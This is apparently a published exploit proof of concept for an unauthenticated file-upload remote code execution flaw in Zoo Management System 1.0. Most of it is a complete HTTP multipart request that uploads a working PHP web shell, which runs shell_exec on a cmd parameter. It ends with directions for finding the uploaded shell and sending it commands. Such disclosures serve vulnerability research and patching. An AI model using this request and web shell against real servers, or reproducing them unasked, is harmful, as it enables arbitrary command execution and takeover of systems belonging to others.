# Exploit Title: Zoo Management System 1.0 - Unauthenticated RCE
# Date: 16.10.2023
# Exploit Author: Çağatay Ceyhan
# Vendor Homepage: https://www.sourcecodester.com/php/15347/zoo-management-system-source-code-php-mysql-database.html#google_vignette
# Software Link: https://www.sourcecodester.com/download-code?nid=15347&title=Zoo+Management+System+source+code+in+PHP+with+MySQL+Database
# Version: 1.0
# Tested on: Windows 11

## Unauthenticated users can reach /zoomanagementsystem/admin/public_html/save_animal and upload a PHP file in place of the animal picture. The endpoint performs no authentication check, and it accepts the upload even though the filename ends in .php and the part is sent as application/octet-stream, so neither the extension nor the MIME type is validated.


POST /zoomanagementsystem/admin/public_html/save_animal HTTP/1.1
Host: localhost
Content-Length: 6162
Cache-Control: max-age=0
sec-ch-ua: "Chromium";v="117", "Not;A=Brand";v="8"
sec-ch-ua-mobile: ?0
sec-ch-ua-platform: "Windows"
Upgrade-Insecure-Requests: 1
Origin: http://localhost
Content-Type: multipart/form-data; boundary=----WebKitFormBoundary8NY8zT5dXIloiUML
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.5938.132 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: navigate
Sec-Fetch-User: ?1
Sec-Fetch-Dest: document
Referer: http://localhost/zoomanagementsystem/admin/public_html/save_animal
Accept-Encoding: gzip, deflate, br
Accept-Language: en-US,en;q=0.9
Connection: close

------WebKitFormBoundary8NY8zT5dXIloiUML
Content-Disposition: form-data; name="animal_id"


------WebKitFormBoundary8NY8zT5dXIloiUML
Content-Disposition: form-data; name="an_given_name"

kdkd
------WebKitFormBoundary8NY8zT5dXIloiUML
Content-Disposition: form-data; name="an_species_name"

ıdsıd
------WebKitFormBoundary8NY8zT5dXIloiUML
Content-Disposition: form-data; name="an_dob"

1552-02-05
------WebKitFormBoundary8NY8zT5dXIloiUML
Content-Disposition: form-data; name="an_gender"

m
------WebKitFormBoundary8NY8zT5dXIloiUML
Content-Disposition: form-data; name="an_avg_lifespan"

3
------WebKitFormBoundary8NY8zT5dXIloiUML
Content-Disposition: form-data; name="class_id"

2
------WebKitFormBoundary8NY8zT5dXIloiUML
Content-Disposition: form-data; name="location_id"

2
------WebKitFormBoundary8NY8zT5dXIloiUML
Content-Disposition: form-data; name="an_dietary_req"

2
------WebKitFormBoundary8NY8zT5dXIloiUML
Content-Disposition: form-data; name="an_natural_habitat"

faad
------WebKitFormBoundary8NY8zT5dXIloiUML
Content-Disposition: form-data; name="an_pop_dist"

eterter
------WebKitFormBoundary8NY8zT5dXIloiUML
Content-Disposition: form-data; name="an_joindate"

5559-02-06
------WebKitFormBoundary8NY8zT5dXIloiUML
Content-Disposition: form-data; name="an_height"

2
------WebKitFormBoundary8NY8zT5dXIloiUML
Content-Disposition: form-data; name="an_weight"

3
------WebKitFormBoundary8NY8zT5dXIloiUML
Content-Disposition: form-data; name="an_description"


------WebKitFormBoundary8NY8zT5dXIloiUML
Content-Disposition: form-data; name="images[]"; filename="ultra.php"
Content-Type: application/octet-stream

<?php
if (!empty($_POST['cmd'])) {
    $cmd = shell_exec($_POST['cmd']);
}
?>
<!DOCTYPE html>
<html lang="en">
<head>
    <meta charset="utf-8">
    <meta http-equiv="X-UA-Compatible" content="IE=edge">
    <meta name="viewport" content="width=device-width, initial-scale=1">
    <title>Web Shell</title>
    <style>
        * {
            -webkit-box-sizing: border-box;
            box-sizing: border-box;
        }

        body {
            font-family: sans-serif;
            color: rgba(0, 0, 0, .75);
        }

        main {
            margin: auto;
            max-width: 850px;
        }

        pre,
        input,
        button {
            padding: 10px;
            border-radius: 5px;
            background-color: #efefef;
        }

        label {
            display: block;
        }

        input {
            width: 100%;
            background-color: #efefef;
            border: 2px solid transparent;
        }

        input:focus {
            outline: none;
            background: transparent;
            border: 2px solid #e6e6e6;
        }

        button {
            border: none;
            cursor: pointer;
            margin-left: 5px;
        }

        button:hover {
            background-color: #e6e6e6;
        }

        .form-group {
            display: -webkit-box;
            display: -ms-flexbox;
            display: flex;
            padding: 15px 0;
        }
    </style>

</head>

<body>
    <main>
        <h1>Web Shell</h1>
        <h2>Execute a command</h2>

        <form method="post">
            <label for="cmd"><strong>Command</strong></label>
            <div class="form-group">
                <input type="text" name="cmd" id="cmd" value="<?= htmlspecialchars($_POST['cmd'], ENT_QUOTES, 'UTF-8') ?>"
                       onfocus="this.setSelectionRange(this.value.length, this.value.length);" autofocus required>
                <button type="submit">Execute</button>
            </div>
        </form>

        <?php if ($_SERVER['REQUEST_METHOD'] === 'POST'): ?>
            <h2>Output</h2>
            <?php if (isset($cmd)): ?>
                <pre><?= htmlspecialchars($cmd, ENT_QUOTES, 'UTF-8') ?></pre>
            <?php else: ?>
                <pre><small>No result.</small></pre>
            <?php endif; ?>
        <?php endif; ?>
    </main>
</body>
</html>
------WebKitFormBoundary8NY8zT5dXIloiUML
Content-Disposition: form-data; name="an_med_record"


------WebKitFormBoundary8NY8zT5dXIloiUML
Content-Disposition: form-data; name="an_transfer"


------WebKitFormBoundary8NY8zT5dXIloiUML
Content-Disposition: form-data; name="an_transfer_reason"


------WebKitFormBoundary8NY8zT5dXIloiUML
Content-Disposition: form-data; name="an_death_date"


------WebKitFormBoundary8NY8zT5dXIloiUML
Content-Disposition: form-data; name="an_death_cause"


------WebKitFormBoundary8NY8zT5dXIloiUML
Content-Disposition: form-data; name="an_incineration"


------WebKitFormBoundary8NY8zT5dXIloiUML
Content-Disposition: form-data; name="m_gest_period"


------WebKitFormBoundary8NY8zT5dXIloiUML
Content-Disposition: form-data; name="m_category"


------WebKitFormBoundary8NY8zT5dXIloiUML
Content-Disposition: form-data; name="m_avg_body_temp"


------WebKitFormBoundary8NY8zT5dXIloiUML
Content-Disposition: form-data; name="b_nest_const"


------WebKitFormBoundary8NY8zT5dXIloiUML
Content-Disposition: form-data; name="b_clutch_size"


------WebKitFormBoundary8NY8zT5dXIloiUML
Content-Disposition: form-data; name="b_wingspan"


------WebKitFormBoundary8NY8zT5dXIloiUML
Content-Disposition: form-data; name="b_color_variant"


------WebKitFormBoundary8NY8zT5dXIloiUML
Content-Disposition: form-data; name="f_body_temp"


------WebKitFormBoundary8NY8zT5dXIloiUML
Content-Disposition: form-data; name="f_water_type"


------WebKitFormBoundary8NY8zT5dXIloiUML
Content-Disposition: form-data; name="f_color_variant"


------WebKitFormBoundary8NY8zT5dXIloiUML
Content-Disposition: form-data; name="rep_type"


------WebKitFormBoundary8NY8zT5dXIloiUML
Content-Disposition: form-data; name="clutch_size"


------WebKitFormBoundary8NY8zT5dXIloiUML
Content-Disposition: form-data; name="num_offspring"


------WebKitFormBoundary8NY8zT5dXIloiUML
Content-Disposition: form-data; name="submit"


------WebKitFormBoundary8NY8zT5dXIloiUML--




## After the POST request is sent, the uploaded file is stored under http://localhost/zoomanagementsystem/img/animals/, with a numeric suffix appended to the original basename (here ultra_1697442648.php). The attacker can then execute arbitrary commands by POSTing a cmd parameter to http://localhost/zoomanagementsystem/img/animals/ultra_1697442648.php.